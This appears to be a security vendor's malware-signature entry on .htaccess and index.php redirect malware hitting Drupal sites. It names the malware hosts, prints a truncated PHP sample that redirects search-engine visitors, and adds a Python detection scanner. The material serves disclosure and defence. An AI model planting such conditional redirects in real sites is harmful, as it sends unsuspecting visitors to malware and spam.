Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam). In some cases, PHP code is added to index.php to perform the redirection instead.
Loads malware from:
http://alolipololi.osa.pl
http://drivegup.tk
And other domains.
Affecting:
Drupal sites.
Clean up and details:
Remove offending code from .htaccess and index.php.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware sample:
..
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
    $referer=$_SERVER['HTTP_REFERER'];
    $ua=$_SERVER['HTTP_USER_AGENT'];
    if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
        if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
            header("Location: http://alolipololi.osa.pl/");
        }
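A scan for the trait visible in the sample above, a redirect that only fires for visitors arriving from a search engine, added here as an example and not part of the original page. The mod_rewrite form of the check, the sample files and the placeholder domain redirect-target.example are constructed assumptions.

```python
import re

# Search engines named in the referer checks of the sample on this page.
ENGINES = r"(?:google|yahoo|bing)"
PHP_REFERER = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]", re.I)
PHP_ENGINE = re.compile(r"(?:stristr|stripos|strpos|preg_match)\s*\([^)]*" + ENGINES, re.I)
PHP_REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)
# Assumed mod_rewrite form: a referer condition naming an engine, then an absolute-URL rule.
HT_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*" + ENGINES, re.I | re.M)
HT_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I | re.M)


def scan(name, text):
    """Return redirect targets when a redirect is gated on a search-engine referer."""
    if name.endswith(".htaccess"):
        return HT_RULE.findall(text) if HT_COND.search(text) else []
    if PHP_REFERER.search(text) and PHP_ENGINE.search(text):
        return PHP_REDIRECT.findall(text)
    return []


# Constructed samples (placeholder domains), not files from a real site.
SAMPLES = {
    "infected/index.php": """<?php error_reporting(0);
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"google")) {
  header("Location: http://redirect-target.example/"); }
""",
    "infected/.htaccess": """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://redirect-target.example/ [R=301,L]
""",
    "clean/index.php": """<?php
if (!$logged_in) { header("Location: https://site.example/user/login"); }
""",
    "clean/.htaccess": """RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^ https://site.example%{REQUEST_URI} [R=301,L]
""",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        hits = scan(name, text)
        status = "SUSPICIOUS, redirects to " + ", ".join(hits) if hits else "ok"
        print(name + ": " + status)
```

A hit is a lead for manual review of the file, since obfuscated variants will not match these patterns.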